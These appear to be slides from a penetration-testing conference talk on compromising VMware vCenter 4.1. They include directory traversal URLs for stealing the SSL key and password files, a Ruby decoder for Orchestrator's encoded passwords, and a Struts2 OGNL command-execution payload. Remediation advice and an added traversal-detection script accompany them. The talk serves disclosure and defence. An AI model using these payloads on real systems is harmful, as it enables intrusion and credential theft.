ERPScan Security Scanner for SAP
Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds
Alexander Minozhenko

Pen-tester at Digital Security
Researcher
DEFCON RUSSIA DCG#7812 / Zeronights
DCG#7812 CTF
Thanks for ideas and support to Alexey Sintsov

What do pen-testers do?
• Scanning
• Fingerprinting
• Banner grabbing
• Play with passwords
• Find vulns.
• Exploit vulns.
• Escalate privs.
• Dig in
• Find ways to make attacks
• etc.

Static
— Source code review
  • regexp
  • formal methods
  • hand testing
— Reverse engineering
  • formal methods
  • hands...
Dynamic
— Fuzzing (bin/web)
  + typical bugs for the class
  + reverse engineering
— Hand testing
Architecture analysis (logic flaws)
Use vuln. database (CVE/exploit-db/etc.)

Tasks:
• pwn target :)
• show the most dangerous vulns.
• show real attacks and what an attacker can do
Time: not much :)
Targets: a large number of targets, of different types

VMware vCenter Server
VMware vCenter Server is the solution to manage VMware vSphere.
vSphere - virtualization operating system.
(Diagram: workstations connect to vCenter Server, which manages many VMs across several VMware vSphere hosts.)

VMware vCenter version 4.1 update 1
Services:
— Update Manager
— vCenter Orchestrator
— Chargeback
— Other
Each service has its own web server.
(VMware marketing image: Automation - unlocks the power of VMware vSphere through proactive management; Scalability - scalable and extensible management platform; Visibility - deep visibility into every level of the virtual infrastructure.)

CVE-2009-1523
Directory traversal in Jetty web server
http://target:9084/vci/download/health.xml/%3f/../../../../FILE
Discovered by Claudio Criscione
But fixed in VMware Update Manager 4.1 update 1 :(

• Directory traversal in Jetty web server
• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..\FILE.EXT
• Discovered by Alexey Sintsov
• Metasploit module vmware_update_manager_traversal.rb by sinn3r

Directory traversal: what file to read?
Claudio Criscione proposed reading vpxd-profiler-*
/SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
• Contains logs of SOAP requests with the session ID

• "VASTO - collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions."
  http://vasto.nibblesec.org/
• vmware_updatemanager_traversal.rb - Jetty path traversal
• vmware_session_rider.rb - local proxy to ride stolen SOAPID sessions

Fixed in version 4.1 update 1, contains IP addresses
(Screenshot: a browser fetching ProgramData\VMware\VMware VirtualCenter\Logs\vpxd-profiler-6.log of a 4.1 update 1 server through the :9084/vci/downloads/.\..\..\..\..\..\..\..\ traversal. The log header reads "Section for VMware VirtualCenter, pid=3564, version=4.1 build=build-345043 option=Release"; the body holds only counters such as /DbStats/Pool/Cnx/InUse/total, /EventStats/PendingEvents/Count/total and /InventoryStats/ManagedEntityStats/Clusters/total.)
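An added example from the detection side, not part of the talk: a check that flags requests to the Update Manager download endpoint whose path, decoded the way the server decodes it, walks out of the directory. It covers both traversal shapes shown on the slides, the "%3f/../" form after health.xml and the backslash form encoded as %5C. The log lines, client addresses and timestamps are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the talk). The first two use the
# traversal shapes shown on the slides: "%3f/../" after health.xml, and "\.."
# encoded as %5C; the third is an ordinary request. Addresses/times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2011:12:33:20 +0300] "GET /vci/download/health.xml/%3f/../../../../FILE HTTP/1.1" 200 412
10.0.0.5 - - [01/Jan/2011:12:33:21 +0300] "GET /vci/downloads/.%5C..%5C..%5C..%5C..%5CFILE.EXT HTTP/1.1" 200 9000
10.0.0.7 - - [01/Jan/2011:12:34:00 +0300] "GET /vci/downloads/health.xml HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def is_traversal(raw_path: str) -> bool:
    """True if the request path contains a '..' segment once it is decoded
    the way the server will see it."""
    # Only a literal '?' starts the query string; an encoded %3f is part of
    # the path, which is exactly what the CVE-2009-1523 pattern relies on.
    path_part = raw_path.split("?", 1)[0]
    # Decode twice so double-encoded variants (%255C) are caught as well.
    decoded = unquote(unquote(path_part))
    # Windows accepts '\' as a separator, which the %5C variant relies on,
    # so normalise it to '/' before looking at the segments.
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments


def flag_update_manager_traversal(log_text: str) -> list:
    """Return (client_ip, raw_path) for suspicious hits on the Update Manager
    download endpoint (/vci/download and /vci/downloads on port 9084)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        if path.startswith("/vci/download") and is_traversal(path):
            hits.append((line.split(" ", 1)[0], path))
    return hits


if __name__ == "__main__":
    for ip, path in flag_update_manager_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

The same normalisation (split the query on a raw "?", decode, treat "\" as "/") is what a WAF rule in front of port 9084 needs; matching on the literal "../" alone misses both encoded forms.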

Make ARP poisoning attack
Spoof SSL certificate

Administrators check the SSL cert
(Screenshot of the vSphere Client "Security Warning" dialog: "Certificate Warnings. An untrusted SSL certificate is installed on "win-9iipbe5q5br" and secure communication cannot be guaranteed. Depending on your security policy, this issue might not represent a security concern. You may need to install a trusted SSL certificate on your server to prevent this warning from appearing. Click Ignore to continue using the current SSL certificate." Buttons: View Certificate / Ignore / Cancel; checkbox "Install this certificate and do not display any security warnings for 'win-9iipbe5q5br'".)

• Steal the SSL key via directory traversal
  http://target:9084/vci/downloads/.\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• Make ARP spoofing
• Decrypt traffic with the stolen SSL key
• What if ARP spoofing does not work?

VMware vCenter Orchestrator
VMware vCO - software to automate configuration and management
Installed by default with vCenter
• Has an interesting file:
  C:\Program Files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties

VMware vCenter Orchestrator
Which contains an MD5 password without salt
Could easily be bruteforced using rainbow tables
(Screenshot: browser fetching the file through the :9084/vci/downloads/ traversal.)

(Screenshot: VMware vCenter Orchestrator Configuration web UI. Sections: General, Network, LDAP, Database, Server Certificate, Licenses, Startup Options, Troubleshooting, Plug-ins: Mail (1.1.0), SSH (1.0.2), vCenter 4.0 (4.0.0). The vCenter 4.0 plug-in page "VMware Virtual Infrastructure" holds: Host new-virtual-center-host, Port 443, Secure channel, Path /sdk, User name vmware, Password, and "Share a unique session" as the session strategy. The underlying HTML is a form named PluginSave that is POSTed to PluginSave.action.)

VMware vCenter Orchestrator
• vCO stores passwords in files:
  • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
  • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties

VC.xml excerpt (element names were lost in extraction, values kept):
  true
  https://new-virtual-center-host:443/sdk
  vmware
  <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef

Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b  vmware
00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079  vcenter
(The slide colours the hex strings: red bytes look like the length, green bytes are in the ASCII range, black bytes look random.)

Algorithm of password encoding (the slide's Java listing, cleaned up):

  for (int i = 0; i < nbDigits; i++) {
      int value = 0;
      if (i < pwd.length()) {
          value = pwd.charAt(i);                 // take the i-th password symbol
      } else {
          value = Math.abs(rnd.nextInt() % 100); // pad with a random byte
      }
      // i-th password symbol + position of the symbol, written as hex
      String toAdd = Integer.toHexString(value + i);
      result.append(toAdd);
  }

Decoder (the slide's Ruby listing, cleaned up; the sample value is the "vmware" string from the slide):

  pass = "006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b"
  len = pass[0..2].to_i                       # first three digits: password length
  enc_pass = pass[3..-1].scan(/.{2}/)         # the rest as hex byte pairs
  dec_pass = (0...len).collect do |i|
    byte = enc_pass[i].to_i(16)
    byte -= i                                 # undo the "+ position" step
    byte.chr
  end
  puts dec_pass.join                          # => vmware

VMware vCenter Orchestrator uses Struts2 version 2.11 (discovered by Digital Defense, Inc.)
CVE-2010-1870 Struts2/XWork remote command execution, discovered by Meder Kydyraliev
Fixed in 4.2

  #memberAccess['allowStaticMethodAccess'] = true
  #foo = new java.lang.Boolean("false")
  #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  #rt = @java.lang.Runtime@getRuntime()
  #rt.exec('calc.exe')

Attack Vectors
• Directory traversal + ARP poisoning
• Directory traversal + password decoding/bruteforcing
• Remote code execution using the Struts2 bug

• Update to the latest version: 4.2 update 4 or 5
• Filter the administration services
• VMware KB 2021259
• VMware vSphere Security Hardening Guide

Conclusions
• Passwords must be stored as a salted hash or encrypted
• Fixed bugs are not always fixed in the proper way
• A pen-tester will get more profit if he tries to research something
• One simple bug and we can own the whole infrastructure

a.minozhenko@dsec.ru
@al3xmin